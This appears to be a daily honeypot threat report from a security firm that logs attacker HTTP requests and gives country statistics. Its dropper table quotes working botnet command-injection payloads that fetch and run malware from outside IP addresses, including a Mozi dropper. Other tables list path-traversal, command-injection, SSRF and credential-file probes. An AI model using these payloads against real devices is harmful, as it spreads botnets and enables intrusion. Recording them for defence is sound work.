Report: 2025-05-06

Author: Shoggoth Industries

Daily Report: 2025-05-06

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 145 new requests that have never been observed before (these were added to the monitored request database).

A total of 1355 requests were recorded during the day, originating from 5 different countries, with a peak of 431 requests coming from NL.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Germany |
| SG | Germany |
| SG | Germany |
| US | Germany |
| SG | Germany |
| US | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 45.95.147.209 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1 |
| 103.77.42.36 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 141.98.11.137 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F51.38.137.115%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1 |
| 185.218.84.39 | GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\x5C/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1 |
| 196.251.72.142 | GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsbg;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsbg HTTP/1.1 |

request

The requests listed here are those that have not yet been integrated into the request database.

| index | number_of_occurence | request |
|---|---|---|
| 62 | 4 | POST /goform/webLogin HTTP/1.1 |
| 178 | 2 | GET /.env.temp HTTP/1.1 |
| 179 | 2 | GET /.env_ HTTP/1.1 |
| 180 | 2 | POST /wp-admin/admin-ajax.php HTTP/1.1 |
| 191 | 1 | \x03\x00\x00.)\xE0\x00\x00\x00\x00\x00Cookie: mstshash=EBWYXZBE |
| 198 | 1 | GET /Backend/test HTTP/1.1 |
| 205 | 1 | CONNECT www.naver.com:443 HTTP/1.1 |
| 212 | 1 | GET /src.7z HTTP/1.1 |
| 213 | 1 | GET /bin.7z HTTP/1.1 |
| 214 | 1 | GET /html.7z HTTP/1.1 |
| 215 | 1 | GET /www.7z HTTP/1.1 |
| 216 | 1 | GET /web.7z HTTP/1.1 |
| 217 | 1 | GET /backup.7z HTTP/1.1 |
| 218 | 1 | GET /xxx.xxx.xxx.xxx.rar HTTP/1.1 |
| 219 | 1 | GET /old.rar HTTP/1.1 |
| 220 | 1 | GET /data.rar HTTP/1.1 |
| 221 | 1 | GET /upload.rar HTTP/1.1 |
| 222 | 1 | GET /bin/bin.rar HTTP/1.1 |
| 223 | 1 | GET /web.config.rar HTTP/1.1 |
| 224 | 1 | GET /portal.rar HTTP/1.1 |
| 225 | 1 | GET /source.rar HTTP/1.1 |
| 226 | 1 | GET /src.rar HTTP/1.1 |
| 228 | 1 | GET /portal.tar HTTP/1.1 |
| 229 | 1 | GET /source.tar HTTP/1.1 |
| 230 | 1 | GET /src.tar HTTP/1.1 |
| 231 | 1 | GET /bin.tar HTTP/1.1 |
| 232 | 1 | GET /html.tar HTTP/1.1 |
| 234 | 1 | GET /web.tar HTTP/1.1 |
| 236 | 1 | GET /xxx.xxx.xxx.xxx.7z HTTP/1.1 |
| 237 | 1 | GET /old.7z HTTP/1.1 |
| 238 | 1 | GET /data.7z HTTP/1.1 |
| 239 | 1 | GET /upload.7z HTTP/1.1 |
| 240 | 1 | GET /bin/bin.7z HTTP/1.1 |
| 241 | 1 | GET /web.config.7z HTTP/1.1 |
| 242 | 1 | GET /portal.7z HTTP/1.1 |
| 243 | 1 | GET /source.7z HTTP/1.1 |
| 244 | 1 | GET /bin/bin.gz HTTP/1.1 |
| 245 | 1 | GET /web.config.gz HTTP/1.1 |
| 246 | 1 | GET /portal.gz HTTP/1.1 |
| 247 | 1 | GET /source.gz HTTP/1.1 |
| 248 | 1 | GET /src.gz HTTP/1.1 |
| 249 | 1 | GET /bin.gz HTTP/1.1 |
| 250 | 1 | GET /html.gz HTTP/1.1 |
| 251 | 1 | GET /www.gz HTTP/1.1 |
| 252 | 1 | GET /web.gz HTTP/1.1 |
| 253 | 1 | GET /backup.gz HTTP/1.1 |
| 254 | 1 | GET /xxx.xxx.xxx.xxx.tar HTTP/1.1 |
| 255 | 1 | GET /old.tar HTTP/1.1 |
| 256 | 1 | GET /data.tar HTTP/1.1 |
| 257 | 1 | GET /upload.tar HTTP/1.1 |
| 258 | 1 | GET /bin/bin.tar HTTP/1.1 |
| 259 | 1 | GET /web.config.tar HTTP/1.1 |
| 260 | 1 | GET /data.tar.gz HTTP/1.1 |
| 261 | 1 | GET /upload.tar.gz HTTP/1.1 |
| 262 | 1 | GET /bin/bin.tar.gz HTTP/1.1 |
| 263 | 1 | GET /web.config.tar.gz HTTP/1.1 |
| 264 | 1 | GET /portal.tar.gz HTTP/1.1 |
| 265 | 1 | GET /source.tar.gz HTTP/1.1 |
| 266 | 1 | GET /src.tar.gz HTTP/1.1 |
| 267 | 1 | GET /bin.tar.gz HTTP/1.1 |
| 268 | 1 | GET /html.tar.gz HTTP/1.1 |
| 269 | 1 | GET /www.tar.gz HTTP/1.1 |
| 270 | 1 | GET /web.tar.gz HTTP/1.1 |
| 272 | 1 | GET /xxx.xxx.xxx.xxx.gz HTTP/1.1 |
| 273 | 1 | GET /old.gz HTTP/1.1 |
| 274 | 1 | GET /data.gz HTTP/1.1 |
| 275 | 1 | GET /upload.gz HTTP/1.1 |
| 276 | 1 | POST /clients/MyCRL HTTP/1.1 |
| 277 | 1 | GET /classes/common/busiFacade.php HTTP/1.1 |
| 278 | 1 | GET /render/info.html HTTP/1.1 |
| 279 | 1 | GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 |
| 280 | 1 | GET /access/set?param=enableapi&value=1 HTTP/1.1 |
| 281 | 1 | GET /cslu/v1/scheduler/jobs HTTP/1.1 |
| 282 | 1 | POST /task/submit/ HTTP/1.1 |
| 283 | 1 | GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1 |
| 284 | 1 | GET /file=http://oast.pro HTTP/1.1 |
| 285 | 1 | GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 |
| 286 | 1 | POST /index.php/display/status_zigbee HTTP/1.1 |
| 287 | 1 | GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1 |
| 289 | 1 | GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1 |
| 290 | 1 | GET /xxx.xxx.xxx.xxx.tar.gz HTTP/1.1 |
| 291 | 1 | GET /old.tar.gz HTTP/1.1 |
| 292 | 1 | \x00\x0E8\xF7\xC2*D2o]L\x00\x00\x00\x00\x00 |
| 295 | 1 | GET /__screenshot-error?file=/etc/passwd HTTP/1.1 |
| 296 | 1 | GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1 |
| 297 | 1 | GET /file=c:%5Cwindows%5Cwin.ini HTTP/1.1 |
| 298 | 1 | GET /file=/etc/passwd HTTP/1.1 |
| 299 | 1 | GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1 |
| 300 | 1 | GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 |
| 301 | 1 | POST /classes/common/busiFacade.php HTTP/1.1 |
| 302 | 1 | GET /php/ztp_gate.php/.js.map HTTP/1.1 |
| 303 | 1 | GET /interview?i=/etc/passwd HTTP/1.1 |
| 304 | 1 | GET /device/config HTTP/1.1 |
| 305 | 1 | GET /system/config_menu.htm HTTP/1.1 |
| 306 | 1 | GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 |
| 307 | 1 | GET /Admin/Admin.aspx HTTP/1.1 |
| 308 | 1 | GET /bin.rar HTTP/1.1 |
| 309 | 1 | GET /html.rar HTTP/1.1 |
| 310 | 1 | GET /www.rar HTTP/1.1 |
| 311 | 1 | GET /web.rar HTTP/1.1 |
| 313 | 1 | GET /xxx.xxx.xxx.xxx.zip HTTP/1.1 |
| 314 | 1 | GET /old.zip HTTP/1.1 |
| 315 | 1 | GET /data.zip HTTP/1.1 |
| 316 | 1 | GET /upload.zip HTTP/1.1 |
| 317 | 1 | GET /bin/bin.zip HTTP/1.1 |
| 318 | 1 | GET /web.config.zip HTTP/1.1 |
| 319 | 1 | GET /portal.zip HTTP/1.1 |
| 320 | 1 | GET /source.zip HTTP/1.1 |
| 321 | 1 | GET /src.zip HTTP/1.1 |
| 322 | 1 | GET /bin.zip HTTP/1.1 |
| 323 | 1 | GET /html.zip HTTP/1.1 |
| 353 | 1 | GET /www.zip HTTP/1.1 |
| 354 | 1 | GET /web.zip HTTP/1.1 |
| 436 | 1 | GET /admin/assets/css/jquery-ui.css HTTP/1.0 |
| 460 | 1 | POST /api/user/binLookup?time=1746507200284418536 HTTP/1.1 |
| 461 | 1 | GET /api/bin/440393?time=1746507199789887630 HTTP/1.1 |
| 462 | 1 | GET /config/index?time=1746506624750874530 HTTP/1.1 |
| 468 | 1 | \x00\x0E8\xD44\x0C\x95\x9C\xD8\xCCB\x00\x00\x00\x00\x00 |
| 500 | 1 | GET /.AWS/test HTTP/1.1 |
| 501 | 1 | GET /.aws/test HTTP/1.1 |
| 510 | 1 | POST /api/user/binLookup?time=1746507471189537658 HTTP/1.1 |
| 511 | 1 | GET /api/bin/440393?time=1746507470788211294 HTTP/1.1 |
| 512 | 1 | GET /config/index?time=1746506740960468304 HTTP/1.1 |
| 517 | 1 | GET /stage/test HTTP/1.1 |
| 518 | 1 | GET /config/test HTTP/1.1 |
| 519 | 1 | GET /twilio/test HTTP/1.1 |
| 520 | 1 | GET /staging/test HTTP/1.1 |
| 521 | 1 | GET /server/test HTTP/1.1 |
| 522 | 1 | GET /media/test HTTP/1.1 |
| 523 | 1 | GET /crm/test HTTP/1.1 |
| 524 | 1 | GET /vendor/test HTTP/1.1 |
| 525 | 1 | GET /app/test HTTP/1.1 |
| 526 | 1 | GET /admin/test HTTP/1.1 |
| 527 | 1 | GET /Api/test HTTP/1.1 |
| 528 | 1 | GET /API/test HTTP/1.1 |
| 529 | 1 | GET /api/test HTTP/1.1 |
| 530 | 1 | GET /backend/test HTTP/1.1 |
| 531 | 1 | GET /.Aws/test HTTP/1.1 |
| 541 | 1 | GET /Odin/http/call1746559309 HTTP/1.1 |
| 542 | 1 | GET /OdinHttpCall1746559309 HTTP/1.1 |
| 543 | 1 | GET /odinhttpcall1746559309 HTTP/1.1 |
| 551 | 1 | GET /Odin/http/call1746560918 HTTP/1.1 |
| 552 | 1 | GET /OdinHttpCall1746560918 HTTP/1.1 |
| 557 | 1 | \x00\x0E8\x92\xE6v\x11P)\x17\x15\x00\x00\x00\x00\x00 |
| 558 | 1 | GET /odinhttpcall1746560918 HTTP/1.1 |

country_iso_code

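| index | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 431 | NL |
| 1 | 240 | US |
| 2 | 151 | GB |
| 3 | 113 | AE |
| 4 | 111 | CN |
| 5 | 78 | DE |
| 6 | 42 | PL |
| 7 | 18 | SC |
| 8 | 14 | AZ |
| 9 | 14 | RU |
| 10 | 12 | CA |
| 11 | 12 | IN |
| 12 | 11 | AO |
| 13 | 11 | JP |
| 14 | 11 | IL |
| 15 | 10 | PT |
| 16 | 9 | SG |
| 17 | 8 | GH |
| 18 | 6 | MD |
| 19 | 5 | KR |
| 20 | 5 | BE |
| 21 | 4 | ID |
| 22 | 4 | UA |
| 23 | 4 | BR |
| 24 | 4 | BG |
| 25 | 3 | MC |
| 26 | 3 | HK |
| 27 | 3 | PK |
| 28 | 3 | FR |
| 29 | 3 | IR |
| 30 | 2 | NG |
| 31 | 2 | VE |
| 32 | 1 | MY |
| 33 | 1 | TH |
| 34 | 1 | IT |
| 35 | 1 | TW |
| 36 | 1 | LT |
| 37 | 1 | MX |
| 38 | 1 | ES |
| 39 | 1 | GE |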
